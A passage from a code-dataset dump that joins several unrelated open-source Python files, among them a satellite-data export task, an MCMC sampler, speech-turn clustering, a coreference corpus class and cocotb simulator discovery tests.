elif self._task_result is not None:
labels = self._result_attribute("labels")
if labels is not None:
self.key = labels[3]
def get_file(self, file_obj):
"""Download the exported Storage object to a local file.
:param str file_obj: A file-like object or name of file to download into.
:raises TransientResultError: If the export hasn't completed yet.
"""
if self.key is None:
raise TransientResultError()
else:
return Storage().get_file(self.key, file_obj)
def get_result(self, wait=False, timeout=None):
"""
Attempt to load the result for this export task. After returning
from this method without an exception raised, the information for
the task is available through the various properties.
:param bool wait: Whether to wait for the task to complete or raise
a :exc:`~descarteslabs.common.tasks.futuretask.TransientResultError`
if the task hasn't completed yet.
:param int timeout: How long to wait in seconds for the task to complete, or
:const:`None` to wait indefinitely.
:raises TransientResultError: When the result is not ready yet (and not waiting).
:raises ~descarteslabs.common.tasks.TimeoutError: When the timeout has been reached (if waiting and set).
"""
# We have to go through the vector service since we don't
# own the task group
if self._task_result is None:
start = time.time()
while timeout is None or (time.time() - start) < timeout:
try:
result = self.client.get_export_result(self.guid, self.tuid)
self._task_result = result.data.attributes
self._set_key(None)
except NotFoundError:
if not wait:
raise TransientResultError()
else:
break
time.sleep(self.COMPLETION_POLL_INTERVAL_SECONDS)
else:
raise TimeoutError()
@property
def result(self):
"""
Export tasks don't have a result.
:raises AttributeError: No result available
"""
raise AttributeError("Export tasks don't have a result")
def __repr__(self):
s = "ExportTask\n"
if self.ready:
s += "\tStatus: {}\n".format(self._task_result.status)
s += "\tMemory usage (MiB): {:.2f}\n".format(
self._task_result.peak_memory_usage / (1024 * 1024.0)
)
s += "\tRuntime (s): {}\n".format(self._task_result.runtime)
else:
s += "\tStatus: Pending\n"
return s
|
spotpy/algorithms/mcmc.py | cheginit/spotpy | 182 | 12634635 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by <NAME>
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: <NAME>
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import _algorithm
import numpy as np
import time
class mcmc(_algorithm):
"""
This class holds the MarkovChainMonteCarlo (MCMC) algorithm, based on:
<NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (1953)
Equation of state calculations by fast computing machines, J. Chem. Phys.
"""
def __init__(self, *args, **kwargs):
"""
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast suited for short sampling time. no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
parallel: str
* seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
* mpi: Message Passing Interface: Parallel computing on cluster pcs (recommended for unix os).
save_sim: boolean
* True: Simulation results will be saved
* False: Simulation results will not be saved
"""
kwargs['optimization_direction'] = 'maximize'
kwargs['algorithm_name'] = 'Markov Chain Monte Carlo (MCMC) sampler'
super(mcmc, self).__init__(*args, **kwargs)
def check_par_validity(self, par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i]
if par[i] > self.max_bound[i]:
par[i] = self.max_bound[i]
else:
print('ERROR: Bounds have not the same lenghts as Parameterarray')
return par
def check_par_validity_reflect(self, par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i] + (self.min_bound[i]- par[i])
elif par[i] > self.max_bound[i]:
par[i] = self.max_bound[i] - (par[i] - self.max_bound[i])
# Postprocessing if reflecting jumped out of bounds
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i]
if par[i] > self.max_bound[i]:
par[i] = self.max_bound[i]
else:
print('ERROR: Bounds have not the same lenghts as Parameterarray')
return par
def get_new_proposal_vector(self,old_par):
new_par = np.random.normal(loc=old_par, scale=self.stepsizes)
#new_par = self.check_par_validity(new_par)
new_par = self.check_par_validity_reflect(new_par)
return new_par
def update_mcmc_status(self,par,like,sim,cur_chain):
self.bestpar[cur_chain]=par
self.bestlike[cur_chain]=like
self.bestsim[cur_chain]=sim
def sample(self, repetitions,nChains=1):
self.set_repetiton(repetitions)
print('Starting the MCMC algotrithm with '+str(repetitions)+ ' repetitions...')
# Prepare storing MCMC chain as array of arrays.
self.nChains = int(nChains)
#Ensure initialisation of chains and database
self.burnIn = self.nChains
# define stepsize of MCMC.
self.stepsizes = self.parameter()['step'] # array of stepsizes
# Metropolis-Hastings iterations.
self.bestpar=np.array([[np.nan]*len(self.stepsizes)]*self.nChains)
self.bestlike=[[-np.inf]]*self.nChains
self.bestsim=[[np.nan]]*self.nChains
self.accepted=np.zeros(self.nChains)
self.nChainruns=[[0]]*self.nChains
self.min_bound, self.max_bound = self.parameter(
)['minbound'], self.parameter()['maxbound']
print('Initialize ', self.nChains, ' chain(s)...')
self.iter=0
param_generator = ((curChain,self.parameter()['random']) for curChain in range(int(self.nChains)))
for curChain,randompar,simulations in self.repeat(param_generator):
# A function that calculates the fitness of the run and the manages the database
like = self.postprocessing(self.iter, randompar, simulations, chains=curChain)
self.update_mcmc_status(randompar, like, simulations, curChain)
self.iter+=1
intervaltime = time.time()
print('Beginn of Random Walk')
# Walk through chains
while self.iter <= repetitions - self.burnIn:
param_generator = ((curChain,self.get_new_proposal_vector(self.bestpar[curChain])) for curChain in range(int(self.nChains)))
for cChain,randompar,simulations in self.repeat(param_generator):
# A function that calculates the fitness of the run and the manages the database
like = self.postprocessing(self.iter, randompar, simulations, chains=cChain)
logMetropHastRatio = np.abs(self.bestlike[cChain])/np.abs(like)
u = np.random.uniform(low=0.3, high=1)
if logMetropHastRatio>1.0 or logMetropHastRatio>u:
self.update_mcmc_status(randompar,like,simulations,cChain)
self.accepted[cChain] += 1 # monitor acceptance
self.iter+=1
# Progress bar
acttime = time.time()
#Refresh MCMC progressbar every two second
if acttime - intervaltime >= 2 and self.iter >=2:
text = '%i of %i (best like=%g)' % (
self.iter + self.burnIn, repetitions, self.status.objectivefunction_max)
text = "Acceptance rates [%] =" +str(np.around((self.accepted)/float(((self.iter-self.burnIn)/self.nChains)),decimals=4)*100).strip('array([])')
print(text)
intervaltime = time.time()
self.final_call()
|
saas/aiops/api/aiops-server/common/log_filter.py | iuskye/SREWorks | 407 | 12634651 | <gh_stars>100-1000
#!/usr/bin/env python
# encoding: utf-8
""" """
__author__ = 'sreworks'
import logging
from flask import request
from common import trace_id_generator
class TraceIdFilter(logging.Filter):
def filter(self, record):
try:
trace_id = request.environ.get("HTTP_TRACE_ID", "None")
if trace_id == "None":
trace_id = trace_id_generator.generate_trace_id(request.environ.get("REMOTE_ADDR"))
user = request.environ.get("HTTP_X_AUTH_USER", "None")
except Exception:
trace_id = "None"
user = "None"
finally:
record.trace_id = trace_id
record.user = user
return True
|
syzygy/scripts/benchmark/chrome_utils.py | nzeh/syzygy | 343 | 12634736 | <reponame>nzeh/syzygy<gh_stars>100-1000
#!python
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for use by scripts in this directory."""
import logging
import os
import os.path
import re
import shutil
import subprocess
_LOGGER = logging.getLogger(__name__)
def Subprocess(cmd_line):
_LOGGER.info('Running command line %s', cmd_line)
return subprocess.call(cmd_line)
def RmTree(directory):
"""Silently do a recursive delete on directory."""
# shutil.rmtree can't cope with read-only files.
Subprocess(['cmd', '/c', 'rmdir', '/s', '/q', directory])
# These directories are relative to the root of the Chrome installation.
_EXPECTED_DIRS = [ 'locales', 'servers', 'extensions' ]
def _PruneDirs(dirs):
"""Removes all unwanted directories from |dirs|, in place."""
for unwanted in (d for d in dirs if d.lower() not in _EXPECTED_DIRS):
dirs.remove(unwanted)
_EXCLUDE_PATTERNS = [
# Exclude all PDBs except for chrome.exe.pdb and chrome.dll.pdb.
re.compile('^(?!(chrome[_\.](exe|dll))\.).+\.pdb$', re.I),
# Exclude all test and chrome frame programs.
re.compile('^.*(test|validate|example|sample).*$', re.I),
# Exclude all zip/archive files.
re.compile('^.+\.(7z|zip)$', re.I),
]
def _FilesToCopy(file_list):
"""Generates the filtered list of files to copy."""
for file_name in file_list:
if not any(p.match(file_name) for p in _EXCLUDE_PATTERNS):
yield file_name
def CopyChromeFiles(src_dir, tgt_dir):
"""Copy all required chrome files from src_dir to tgt_dir."""
src_dir = os.path.abspath(src_dir)
tgt_dir = os.path.abspath(tgt_dir)
if os.path.isdir(tgt_dir):
RmTree(tgt_dir)
os.makedirs(tgt_dir)
for root_dir, sub_dirs, file_list in os.walk(src_dir):
# Prune the top-level directories that we don't want to copy or descend
# into. os.walk refers to the pruned directory list if we change it in
# place, so doesn't actually descend into them.
if src_dir == root_dir:
_PruneDirs(sub_dirs)
# Create the sub-directories at the target destination.
for dir_name in sub_dirs:
src = os.path.join(root_dir, dir_name)
rel_path = os.path.relpath(src, src_dir)
tgt = os.path.join(tgt_dir, rel_path)
_LOGGER.info('Creating directory "%s".', rel_path)
os.mkdir(tgt)
# Copy files over to the target destination.
for file_name in _FilesToCopy(file_list):
src = os.path.join(root_dir, file_name)
rel_path = os.path.relpath(src, src_dir)
tgt = os.path.join(tgt_dir, rel_path)
_LOGGER.info('Copying file "%s".', rel_path)
try:
shutil.copy2(src, tgt)
except IOError:
# When run as part of the build, there may be build targets still in
# flight that we don't depend on and can't copy (because they're opened
# exclusively by the build process). Let's assume that all the files we
# want will copy correctly, ignore the exception, and hope for the best
# on the other side.
_LOGGER.warn('Skipped file "%s".', rel_path)
|
pyannote/audio/pipeline/speech_turn_clustering.py | avramandrei/pyannote-audio | 1,543 | 12634740 | #!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2018-2020 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# <NAME> - http://herve.niderb.fr
import numpy as np
from typing import Optional
from pyannote.core import Annotation
from pyannote.core import Timeline
from pyannote.core.utils.numpy import one_hot_decoding
from pyannote.pipeline import Pipeline
from pyannote.audio.features import Precomputed
from pyannote.pipeline.blocks.clustering import HierarchicalAgglomerativeClustering
from pyannote.pipeline.blocks.clustering import AffinityPropagationClustering
from .utils import assert_string_labels
from pyannote.audio.features.wrapper import Wrapper, Wrappable
class SpeechTurnClustering(Pipeline):
"""Speech turn clustering
Parameters
----------
embedding : Wrappable, optional
Describes how raw speaker embeddings should be obtained.
See pyannote.audio.features.wrapper.Wrapper documentation for details.
Defaults to "@emb" that indicates that protocol files provide
the scores in the "emb" key.
metric : {'euclidean', 'cosine', 'angular'}, optional
Metric used for comparing embeddings. Defaults to 'cosine'.
method : {'pool', 'affinity_propagation'}
Set method used for clustering. "pool" stands for agglomerative
hierarchical clustering with embedding pooling. "affinity_propagation"
is for clustering based on affinity propagation. Defaults to "pool".
window_wise : `bool`, optional
Set `window_wise` to True to apply clustering on embedding extracted
using the built-in sliding window. Defaults to apply clustering at
speech turn level (one average embedding per speech turn).
"""
def __init__(
self,
embedding: Wrappable = None,
metric: Optional[str] = "cosine",
method: Optional[str] = "pool",
window_wise: Optional[bool] = False,
):
super().__init__()
if embedding is None:
embedding = "@emb"
self.embedding = embedding
self._embedding = Wrapper(self.embedding)
self.metric = metric
self.method = method
if self.method == "affinity_propagation":
self.clustering = AffinityPropagationClustering(metric=self.metric)
# sklearn documentation: Preferences for each point - points with
# larger values of preferences are more likely to be chosen as
# exemplars. The number of exemplars, ie of clusters, is influenced by
# the input preferences value. If the preferences are not passed as
# arguments, they will be set to the median of the input similarities.
# NOTE one could set the preference value of each speech turn
# according to their duration. longer speech turns are expected to
# have more accurate embeddings, therefore should be prefered for
# exemplars
else:
self.clustering = HierarchicalAgglomerativeClustering(
method=self.method, metric=self.metric, use_threshold=True
)
self.window_wise = window_wise
def _window_level(self, current_file: dict, speech_regions: Timeline) -> Annotation:
"""Apply clustering at window level
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_regions : `Timeline`
Speech regions.
Returns
-------
hypothesis : `pyannote.core.Annotation`
Clustering result.
"""
# load embeddings
embedding = self._embedding(current_file)
window = embedding.sliding_window
# extract and stack embeddings of speech regions
X = np.vstack(
[
embedding.crop(segment, mode="center", fixed=segment.duration)
for segment in speech_regions
]
)
# apply clustering
y_pred = self.clustering(X)
# reconstruct
y = np.zeros(len(embedding), dtype=np.int8)
# n = total number of "speech" embeddings
# s_pred = current position in y_pred
s_pred, n = 0, len(y_pred)
for segment in speech_regions:
# get indices of current speech segment
((s, e),) = window.crop(
segment, mode="center", fixed=segment.duration, return_ranges=True
)
# hack for the very last segment that might overflow by 1
e_pred = min(s_pred + e - s, n - 1)
e = s + (e_pred - s_pred)
# assign y_pred to the corresponding speech regions
y[s:e] = y_pred[s_pred:e_pred]
# increment current position in y_red
s_pred += e - s
# reconstruct hypothesis
return one_hot_decoding(y, window)
def _turn_level(self, current_file: dict, speech_turns: Annotation) -> Annotation:
"""Apply clustering at speech turn level
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_turns : `Annotation`
Speech turns. Should only contain `str` labels.
Returns
-------
hypothesis : `pyannote.core.Annotation`
Clustering result.
"""
assert_string_labels(speech_turns, "speech_turns")
embedding = self._embedding(current_file)
labels = speech_turns.labels()
X, clustered_labels, skipped_labels = [], [], []
for l, label in enumerate(labels):
timeline = speech_turns.label_timeline(label, copy=False)
# be more and more permissive until we have
# at least one embedding for current speech turn
for mode in ["strict", "center", "loose"]:
x = embedding.crop(timeline, mode=mode)
if len(x) > 0:
break
# skip labels so small we don't have any embedding for it
if len(x) < 1:
skipped_labels.append(label)
continue
clustered_labels.append(label)
X.append(np.mean(x, axis=0))
# apply clustering of label embeddings
clusters = self.clustering(np.vstack(X))
# map each clustered label to its cluster (between 1 and N_CLUSTERS)
mapping = {label: k for label, k in zip(clustered_labels, clusters)}
# map each skipped label to its own cluster
# (between -1 and -N_SKIPPED_LABELS)
for l, label in enumerate(skipped_labels):
mapping[label] = -(l + 1)
# do the actual mapping
return speech_turns.rename_labels(mapping=mapping)
def __call__(
self, current_file: dict, speech_turns: Optional[Annotation] = None
) -> Annotation:
"""Apply speech turn clustering
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_turns : `Annotation`, optional
Speech turns. Should only contain `str` labels.
Defaults to `current_file['speech_turns']`.
Returns
-------
speech_turns : `pyannote.core.Annotation`
Clustered speech turns (or windows in case `window_wise` is True)
"""
if speech_turns is None:
speech_turns = current_file["speech_turns"]
if self.window_wise:
return self._window_level(
current_file, speech_turns.get_timeline().support()
)
return self._turn_level(current_file, speech_turns)
|
examples/example_unicode.py | alexbzg/picoweb | 428 | 12634770 | <gh_stars>100-1000
#
# This is a picoweb example showing rendering of template
# with Unicode (UTF-8) characters.
#
import picoweb
app = picoweb.WebApp(__name__)
@app.route("/")
def index(req, resp):
yield from picoweb.start_response(resp)
data = {"chars": "абвгд", "var1": "α", "var2": "β", "var3": "γ"}
yield from app.render_template(resp, "unicode.tpl", (data,))
import ulogging as logging
logging.basicConfig(level=logging.INFO)
app.run(debug=True)
|
pywemo/ouimeaux_device/motion.py | sullivanmj/pywemo | 102 | 12634771 | <reponame>sullivanmj/pywemo<gh_stars>100-1000
"""Representation of a WeMo Motion device."""
from . import Device
class Motion(Device):
"""Representation of a WeMo Motion device."""
|
cort/core/corpora.py | leonardoboliveira/cort | 141 | 12634777 | """ Represent and manipulate text collections as a list of documents."""
from collections import defaultdict
import multiprocessing
from cort.analysis import data_structures
from cort.core import documents
from cort.core import spans
__author__ = 'smartschat'
def from_string(string):
return documents.CoNLLDocument(string)
class Corpus:
"""Represents a text collection (a corpus) as a list of documents.
Such a text collection can also be read from data, and be supplemented with
antecedent information.
Attributes:
description(str): A human-readable description of the corpus.
documents (list(Document)): A list of CoNLL documents.
"""
def __init__(self, description, corpus_documents):
"""Construct a Corpus from a description and a list of documents.
Args:
description (str): A human-readable description of the corpus.
documents (list(Document)): A list of documents.
"""
self.description = description
self.documents = corpus_documents
def __iter__(self):
"""Return an iterator over documents in the corpus.
Returns:
An iterator over CoNLLDocuments.
"""
return iter(self.documents)
@staticmethod
def from_file(description, coref_file):
"""Construct a new corpus from a description and a file.
The file must contain documents in the format for the CoNLL shared
tasks on coreference resolution, see
http://conll.cemantix.org/2012/data.html.
Args:
description (str): A human-readable description of the corpus.
coref_file (file): A text file of documents in the CoNLL format.
Returns:
Corpus: A corpus consisting of the documents described in
coref_file
"""
if coref_file is None:
return []
document_as_strings = []
current_document = ""
for line in coref_file.readlines():
if line.startswith("#begin") and current_document != "":
document_as_strings.append(current_document)
current_document = ""
current_document += line
document_as_strings.append(current_document)
return Corpus(description, sorted([from_string(doc) for doc in
document_as_strings]))
def write_to_file(self, file):
"""Write a string representation of the corpus to a file,
Args:
file (file): The file the corpus should be written to.
"""
for document in self.documents:
file.write(document.get_string_representation())
def write_antecedent_decisions_to_file(self, file):
"""Write antecedent decisions in the corpus to a file.
For the format, have a look at the documenation for
read_antecedent_decisions in this class.
Args:
file (file): The file the antecedent decisions should be written
to.
"""
for document in self.documents:
document.write_antecedent_decisions_to_file(file)
def read_antecedents(self, file):
"""Augment corpus with antecedent decisions read from a file.
The attribute annotated_mentions is overwritten by mentions read in
from the antecedents file. Input files should have one antecedent
decision per line, where entries are separated by tabs. The format is
doc_identifier (anaphor_start, anaphor_end) (ante_start, ante_end)
where
- doc_id is the identifier in the first line of an CoNLL document
after #begin document, such as (bc/cctv/00/cctv_0000); part 000
- anaphor_start is the position in the document where the anaphor
begins (counting from 0),
- anaphor_end is the position where the anaphor ends (inclusive),
- ante_start, ante_end analogously for the antecedent.
Args:
file (file): The file the antecedent decisions should be written
to.
"""
doc_identifier_to_pairs = defaultdict(list)
for line in file.readlines():
splitted = line.split("\t")
doc_id = splitted[0]
span_anaphor = splitted[1]
span_antecedent = splitted[2]
doc_identifier_to_pairs[doc_id].append(
(spans.Span.parse(span_anaphor), spans.Span.parse(
span_antecedent)))
for doc in self.documents:
pairs = sorted(doc_identifier_to_pairs[doc.identifier])
doc.get_annotated_mentions_from_antecedent_decisions(pairs)
def read_coref_decisions(self,
mention_entity_mapping,
antecedent_mapping=None):
"""Augment corpus with coreference and antecedent decisions..
Set set_id attribute and antecedent information for system mentions.
Args:
mention_entity_mapping (dict(Mention, int)): A mapping of mentions
to entity identifiers.
antecedent_mapping (dict(Mention, Mention)): A mapping of mentions
to their antecedent. Optional..
"""
for doc in self.documents:
for mention in doc.system_mentions:
if mention in mention_entity_mapping:
mention.attributes["set_id"] = \
mention_entity_mapping[mention]
if antecedent_mapping and mention in antecedent_mapping:
antecedent = antecedent_mapping[mention]
mention.attributes['antecedent'] = antecedent
mention.document.antecedent_decisions[mention.span] = \
antecedent.span
def get_antecedent_decisions(self, which_mentions="annotated"):
""" Get all antecedent decisions in this corpus.
Args:
which_mentions (str): Either "annotated" or "system". Defaults to
"system". Signals whether to consider annotated mentions or
system mentions.
Returns:
StructuredCoreferenceAnalysis: A StructuredCoreferenceAnalysis
containing all antecedent decisions. Can be accessed like a
dict. If this is assigned a a variable ``x``, the
decisions can be accessed via ``x[self.description][
"decisions"]["all"]``, where ``self.description`` is the
``description`` attribute of the corpus (e.g. ``x["pair"][
"decisions"]["all"])..
"""
antecedent_decisions = {
self.description: {
"decisions": {
"all": {}
}
}
}
all_decisions = set()
for doc in self.documents:
doc_decisions = doc.get_antecedent_decisions(which_mentions)
for ana, ante in doc_decisions.items():
all_decisions.add((ana, ante))
antecedent_decisions[self.description]["decisions"]["all"] = \
data_structures.EnhancedSet(all_decisions)
return data_structures.StructuredCoreferenceAnalysis(
antecedent_decisions, {self.description: self}, None)
def are_coreferent(self, m, n):
""" Compute whether two mentions are coreferent in this corpus.
One use case of this function is when ``m`` and ``n`` belong to a
different corpus object, but you are interested in whether they are
coreferent according to the annotation present in this corpus.
Args:
m (Mention): A mention.
n (Mention): Another mention.
Returns:
True if ``m`` and ``n`` are coreferent according to the annotation
present in this corpus, False otherwise.
"""
if m.document != n.document:
return False
elif m.document not in self.documents:
return False
else:
doc = self.documents[self.documents.index(m.document)]
if m.span not in doc.spans_to_annotated_mentions or \
n.span not in doc.spans_to_annotated_mentions:
return False
m_in_this_corpus = doc.spans_to_annotated_mentions[m.span]
n_in_this_corpus = doc.spans_to_annotated_mentions[n.span]
return m_in_this_corpus.is_coreferent_with(n_in_this_corpus) |
viewflow/parsers/parse_r.py | pietervans/viewflow | 106 | 12634784 | import pathlib
import yaml
import re
from typing import Any, Dict
def parse_r(file: pathlib.Path) -> Dict[str, Any]:
content = file.read_text().split("\n")
l = [i for i, x in enumerate(content) if re.search(r"# ---", x)]
temp = "\n".join(content[l[0] + 1 : l[1]])
yml = re.sub(r"# ", "", temp)
task_config = yaml.safe_load(yml)
extras = {
"type": "ROperator",
"content": "\n".join(content[0 : l[0]] + content[(l[1] + 1) :]),
"task_file_path": str(file)
}
task_config.update(extras)
return task_config
|
opta/commands/init_templates/variables/name.py | riddopic/opta | 595 | 12634801 | <reponame>riddopic/opta<gh_stars>100-1000
import os
from opta.commands.init_templates.helpers import dictionary_deep_set
from opta.commands.init_templates.template import TemplateVariable
from opta.layer import Layer
def apply(d: dict, v: str) -> dict:
set_path = dictionary_deep_set(["name"])
set_path(d, v)
return d
nameVariable = TemplateVariable(
prompt="Name",
applier=apply,
validator=Layer.valid_name,
error_message="Invalid name: can only contain letters, dashes and numbers",
default_value=os.path.basename(os.getcwd()),
)
|
tests/test_cases/test_discovery/test_discovery.py | lavanyajagan/cocotb | 350 | 12634807 | <reponame>lavanyajagan/cocotb
# Copyright (c) 2013 Potential Ventures Ltd
# Copyright (c) 2013 SolarFlare Communications Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Potential Ventures Ltd,
# SolarFlare Communications Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import cocotb
from cocotb._sim_versions import IcarusVersion
from cocotb.binary import BinaryValue
from cocotb.handle import ConstantObject, HierarchyObject, IntegerObject, StringObject
from cocotb.triggers import Timer
# GHDL is unable to access signals in generate loops (gh-2594)
@cocotb.test(
expect_error=IndexError if cocotb.SIM_NAME.lower().startswith("ghdl") else ()
)
async def pseudo_region_access(dut):
"""Test that pseudo-regions are accessible before iteration"""
# Ensure pseudo-region lookup will fail
if len(dut._sub_handles) != 0:
dut._sub_handles = {}
dut.genblk1[0]
@cocotb.test()
async def recursive_discover(dut):
"""Discover absolutely everything in the DUT"""
def _discover(obj):
for thing in obj:
dut._log.debug("Found %s (%s)", thing._name, type(thing))
_discover(thing)
_discover(dut)
@cocotb.test()
async def discover_module_values(dut):
"""Discover everything in the DUT"""
count = 0
for thing in dut:
count += 1
assert count >= 2, "Expected to discover things in the DUT"
@cocotb.test()
async def discover_value_not_in_dut(dut):
"""Try and get a value from the DUT that is not there"""
with pytest.raises(AttributeError):
dut.fake_signal
@cocotb.test()
async def access_signal(dut):
"""Access a signal using the assignment mechanism"""
dut.stream_in_data.setimmediatevalue(1)
await Timer(1, "ns")
assert dut.stream_in_data.value.integer == 1
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_type_bit_verilog(dut):
"""Access type bit in SystemVerilog"""
await Timer(1, "step")
assert dut.mybit.value == 1, "The default value was incorrect"
dut.mybit.value = 0
await Timer(1, "ns")
assert dut.mybit.value == 0, "The assigned value was incorrect"
assert dut.mybits.value == 0b11, "The default value was incorrect"
dut.mybits.value = 0b00
await Timer(1, "ns")
assert dut.mybits.value == 0b00, "The assigned value was incorrect"
assert dut.mybits_uninitialized.value == 0b00, "The default value was incorrect"
dut.mybits_uninitialized.value = 0b11
await Timer(1, "ns")
assert dut.mybits_uninitialized.value == 0b11, "The assigned value was incorrect"
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_type_bit_verilog_metavalues(dut):
"""Access type bit in SystemVerilog with metavalues that the type does not support.
Note that some simulators (wrongly) allow metavalues even for bits when taking the VPI route.
The metavalues still may show up as `0` and `1` in HDL (Xcelium and Riviera).
"""
await Timer(1, "ns")
dut.mybits.value = BinaryValue("XZ")
await Timer(1, "ns")
print(dut.mybits.value.binstr)
if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")):
assert (
dut.mybits.value.binstr.lower() == "xz"
), "The assigned value was not as expected"
elif cocotb.SIM_NAME.lower().startswith(("riviera",)):
assert (
dut.mybits.value.binstr.lower() == "10"
), "The assigned value was not as expected"
else:
assert (
dut.mybits.value.binstr.lower() == "00"
), "The assigned value was incorrect"
dut.mybits.value = BinaryValue("ZX")
await Timer(1, "ns")
print(dut.mybits.value.binstr)
if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")):
assert (
dut.mybits.value.binstr.lower() == "zx"
), "The assigned value was not as expected"
elif cocotb.SIM_NAME.lower().startswith(("riviera",)):
assert (
dut.mybits.value.binstr.lower() == "01"
), "The assigned value was not as expected"
else:
assert (
dut.mybits.value.binstr.lower() == "00"
), "The assigned value was incorrect"
@cocotb.test(
# Icarus up to (and including) 10.3 doesn't support bit-selects, see https://github.com/steveicarus/iverilog/issues/323
expect_error=IndexError
if (
cocotb.SIM_NAME.lower().startswith("icarus")
and (IcarusVersion(cocotb.SIM_VERSION) <= IcarusVersion("10.3 (stable)"))
)
else (),
skip=cocotb.LANGUAGE in ["vhdl"],
)
async def access_single_bit(dut):
"""Access a single bit in a vector of the DUT"""
dut.stream_in_data.value = 0
await Timer(1, "ns")
dut.stream_in_data[2].value = 1
await Timer(1, "ns")
assert dut.stream_out_data_comb.value.integer == (1 << 2)
@cocotb.test()
async def access_single_bit_erroneous(dut):
"""Access a non-existent single bit"""
with pytest.raises(IndexError):
dut.stream_in_data[100000]
# Riviera discovers integers as nets (gh-2597)
# GHDL discovers integers as nets (gh-2596)
# Icarus does not support integer signals (gh-2598)
@cocotb.test(
expect_error=AttributeError
if cocotb.SIM_NAME.lower().startswith(("icarus", "chronologic simulation vcs"))
else (),
expect_fail=(
cocotb.SIM_NAME.lower().startswith("riviera")
and cocotb.LANGUAGE in ["verilog"]
or cocotb.SIM_NAME.lower().startswith("ghdl")
),
)
async def access_integer(dut):
"""Integer should show as an IntegerObject"""
assert isinstance(dut.stream_in_int, IntegerObject)
with pytest.raises(IndexError):
dut.stream_in_int[3]
assert len(dut.stream_in_int) == 1
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_ulogic(dut):
"""Access a std_ulogic as enum"""
dut.stream_in_valid
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_constant_integer(dut):
"""
Access a constant integer
"""
assert isinstance(dut.isample_module1.EXAMPLE_WIDTH, ConstantObject)
assert dut.isample_module1.EXAMPLE_WIDTH == 7
# GHDL inexplicably crashes, so we will skip this test for now
# likely has to do with overall poor support of string over the VPI
@cocotb.test(
